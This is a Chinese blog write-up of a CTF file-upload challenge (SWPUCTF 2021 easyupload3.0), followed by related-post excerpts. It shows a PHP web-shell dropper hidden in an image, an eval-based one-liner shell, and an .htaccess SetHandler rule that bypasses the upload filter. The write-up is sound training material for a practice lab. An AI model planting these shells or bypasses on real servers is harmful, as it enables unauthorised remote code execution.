[SWPUCTF 2021 新生赛]easyupload3.0

于 2024-09-07 11:07:26 发布
阅读量329 收藏 8
点赞数 4
分类专栏: CTF比赛WP 文章标签: 网络安全 web安全 CTF比赛题目 CTF入门 文件上传
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_73049307/article/details/141992710
版权

开启NSSCTF靶场,打开链接:

本来我是想直接上传一个混合php代码的图片,然后访问这个图片以触发生成shell.php,再用蚁剑连接的:

copy /b easyupload3.0.jpg+fopen.php e3.jpg

<?phpfputs(fopen('shell.php','w'),'<?php @eval($_POST["pass"])?>');?>

但是蚁剑连接就是失败,在浏览器中访问/upload/shell.php或/shell.php都显示404 not found,只能用其他方法了

采用.htaccess绕过的方法:

用burp抓包(抓的是一个0 kb的jpg文件)修改filename处的值为.htaccess,并加上下面这段代码:

<FilesMatch "1.jpg">

SetHandler application/x-httpd-php

</FilesMatch>

(.htaccess文件可以被服务器软件检测执行的玩意,只要你往里面塞配置(规则),就可以让服务器软件为所欲为(bushi,利用这个可以绕过php文件上传限制)

可以看到上传.htaccess文件成功

再上传1.jpg文件

(注意:这个1.jpg文件就是前两关用的php一句话木马文件)

用蚁剑进行连接:

得到flag:

NSSCTF{0994111a-d030-4b93-a938-b86e2bfdceec}

南暮思鸢
关注
专栏目录
[SWPUCTF 2021 新生]sql - 联合注入
oZuoShen123的博客
10-07 718
Your Login name:id,flag —— 这里复习了一下任意匹配字符,一开始都以为不用加%,差点忘记了。Your Login name:LTLT_flag,users —— 得到LTLT_flag。1、fuzz看哪些关键字被过滤:空格、substr、=被过滤。这题相比于参考文章的题目多了waf过滤。首先,仍然是网站标题提示参数是wllm。
[SWPUCTF 2021 新生]crypto(1~9)详细解题思路集外代软件安装,拓展安装,库函数安装
最新发布
符啸九天的博客
09-05 377
[SWPUCTF 2021 新生]crypto6 [SWPUCTF 2021 新生]crypto7 [SWPUCTF 2021 新生]crypto8 [SWPUCTF 2021 新生]ez_caesar解题思路
CTF】[SWPUCTF 2021 新生]easyupload3.0
西原一点红的博客
06-20 397
响应说明是黑名单校验尝试后缀绕过,发现行不通htaccessphpinfo里找到flag。
[SWPUCTF 2021]easyupload3.0(WP)
wikey 的博客
03-28 254
第一行是自动查找文件并解析为php。然后打开burp抓住图片上传的数据。修改数据之后写木马并传进去。看起来跟前两次差不多捏。然后复制文件夹去蚁剑链接。老样子burp弄一下。
【NSSCTF】刷题记录——[SWPUCTF 2021 新生]系列(WEB篇)
jameshuangchuan的博客
08-08 2992
此处主要在NSSCTF平台()上开展刷题。
【NSSCTF】刷题记录——[SWPUCTF 2021 新生]系列(CRYPTO篇)
jameshuangchuan的博客
08-28 1094
刚经过reverse的折磨又来?分析可得原文经过了三层加密,按顺序分别是base64、base32、base16,那倒序逐层解密就完事了。看着像是MD5加密过的。字符串复制粘贴到在线MD5解密工具上跑吧。第一次提交flag把牵前面的b'带上了,报错,去掉之后就对了。刚好前段时间刷到到过一篇文章讲猪圈密码的,直接对着看就行。碰到UUEncode解密的时候出现了flag。感觉没看出来啥规律,只好拿出工具无脑碰运气。此处主要在NSSCTF平台(……得到flag是md5yyds。
[SWPUCTF 2021 新生]
snowlyzz的博客
09-11 1547
。。
[SWPUCTF 2021 新生] - web
qq_44640313的博客
01-30 1440
[SWPUCTF 2021 新生] web方向的wp,有一个phar反序列化的题做不动了
[SWPUCTF 2021 新生] web
qq_61768489的博客
08-07 3996
简单来说: 检测路径中是否存在%字符,并且如果%后面的两个字符是十六进制字符,就会对后面的两个字符进行url解码转化,如路径中有%2e./,则会解码为../,转换后判断是否存在../,加入路径中使用.%2e/则能绕过,导致目录穿越漏洞,因为当遍历到第一个.时,后面两个字符是%2并不是./,就不会被处理,绕过检测。没有过滤|这个符号,然后exec执行是没有回显的,这个题目是需要用linux的一个命令,”tee“将想要执行的命令写入到一个文件里面,然后再去访问这个文件,以此来执行这个命令。...
SWPU新生2021 Web部分WriteUp
mumuzi的博客
10-11 4388
第一波放题 gift_F12 直接F12之后搜flag WLLMCTF{We1c0me_t0_WLLMCTF_Th1s_1s_th3_G1ft} caidao 基操题,就不用菜刀,蚁剑直接连,密码wllm,地址就访问的地址,进去在根目录找到flag jicao 搜一下json就会了,我开始其实也不会…我开始get了一个{“json”:“wllm”} 。。。 get:?json={“x”:“wllm”} post:id=wllmNB Do_you_know_http 浏览器WLLM,改User-A
web学习记录
qq_60530516的博客
11-30 959
web学习笔记
文件上传刷题
2301_79880442的博客
03-28 722
打开是一个文件上传题,上传一个php文件,但它说php不可以,抓包修改。把php改成phtml,上传一句话木马,重发,上传成功。用蚁剑连接得到flag。
[SWPUCTF 2021 新生] 第三波放题
weixin_63231007的博客
04-12 6984
[SWPUCTF 2021 新生]easyupload3.0 首先弄个报错出来,随便弄一下,比如弄出一个not found页面,发现是Apache/2.4.7 (Ubuntu) ,既然是 Apache,于是就利用.htaccess来getshell。 建一个.htaccess 文件,里面的内容如下: <FilesMatch "123.jpg"> SetHandler application/x-httpd-php </FilesMatch> 这样的话对文件名包含“123.jp
[SWPUCTF] 2021新生之(NSSCTF)刷题记录 ②
Aluxian_的博客
04-18 1253
【代码】[SWPUCTF] 2021新生之(NSSCTF)刷题记录 ②。
NSSCTF题库[SWPUCTF 2021 新生]+部分新生签到题
热门推荐
J1ng_Hong的博客
10-27 2万+
发现题目需要我们用php伪协议,并且需要前三位是php三个字母。此时我们上网搜索,发现了php://filter可以读取文件。在后面加上write=string.rot13/resource=flag即可。首先一进来就是源码代码审计,非常简单的绕过。其中string.rot13为字符串过滤器。
[SWPUCTF 2021 新生]hardrce
07-25
\[SWPUCTF 2021 新生\]hardrce是一个比赛中的题目,它是一个PHP脚本。这个脚本首先会检查用户传入的参数wllm是否存在,然后会对wllm进行一系列的过滤操作。过滤操作包括去除空格、制表符、回车、换行等特殊字符,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值